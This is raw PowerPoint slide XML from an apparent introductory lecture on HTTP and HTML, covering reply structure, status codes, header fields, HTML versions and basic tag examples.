        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Replies are composed of a header and a body separated by a empty line (CR LF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The header  contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Protocol version (e.g., HTTP/1.0 or HTTP/1.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Status code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Diagnostic text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Other info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>General header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Response header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Entity header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The body is a byte stream</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144176841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r>
              <a:rPr lang="en-GB"/>
              <a:t>Status Codes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="830467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>1xx: Informational - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Request received, continuing process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>2xx: Success - The action was successfully received, understood, and accepted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>3xx: Redirection - Further action must be taken in order to complete the request </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>4xx: Client Error - The request contains bad syntax or cannot be fulfilled </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>5xx: Server Error - The server failed to fulfil an apparently valid request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302027853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GB"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="832515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"200"   ; OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"201"   ; Created</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"202"   ; Accepted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"204"   ; No Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>“301"   ; Moved Permanently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"307"   ; Temporary Redirect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"400"   ; Bad Request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"401"   ; Unauthorized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"403"   ; Forbidden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"404"   ; Not Found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"500"   ; Internal Server Error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"501"   ; Not Implemented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"502"   ; Bad Gateway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>"503"   ; Service Unavailable</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67217506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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Reply Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="836611" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Date: Tue, 03 Nov 2017 8:35:12 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Server: Apache/1.3.14 PHP/3.0.17 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mod_perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/1.23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Content-Type: text/html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Last-Modified: Sun, 12 Oct 2017 18:11:00 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;title&gt;The Page&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="is-IS" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="is-IS" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228572031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r>
              <a:rPr lang="en-GB"/>
              <a:t>Header Fields</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838659" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>General header fields: These refer to the message and not to the resource contained in it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Date, Pragma, Cache-Control, Transfer-Encoding..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Request header fields:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Accept, Host, Authorization, From, If-modified-since, User Agent, Referer...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Response header fields:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Location, Server, WWW-Authenticate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Entity header fields: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Allow, Content-Encoding, Content-Length, Content-Type, Expires, Last-Modified</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112288330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Hypertext Markup Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>A simple data format used to create hypertext documents that are portable from one platform to another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Based on Standard Generalized Markup Language (SGML) (ISO 8879:1986)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTML 2.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Proposed in RFC 1866 (November 1995)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTML 3.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Proposed as World Wide Web Consortium (W3C) recommendation (January 1997)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTML 4.01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Proposed as W3C recommendation (December 1999)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>XHTML 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Attempt by W3C to reformulate HTML into Extensible Markup Language (XML) (January 2000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTML 5.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>W3C recommendation (October 2014)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML 5.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>W3C recommendation (November 2016)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML 5.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>W3C recommendation (December 2017)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3823882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Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic idea is to “markup” document with tags, which add meaning to raw text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start tag: &lt;foo&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Followed by text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End tag: &lt;/foo&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Self-closing tag: &lt;bar /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Void tags (have no end tag): &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tag are hierarchical</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="615924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Tags </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;title&gt;Example&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;p&gt;I am the example text&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3720331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Tags </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>I am the example text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3496463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r>
              <a:rPr lang="en-US"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713733" name="Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2166326"/>
            <a:ext cx="1055688" cy="407194"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:soli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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713734" name="Oval 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2109175"/>
            <a:ext cx="1143000" cy="472679"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12573">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Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713735" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276601" y="2509226"/>
            <a:ext cx="1120820"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Reply</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713736" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2743200" y="2452076"/>
            <a:ext cx="2514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3737" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="2280626"/>
            <a:ext cx="2514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3738" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
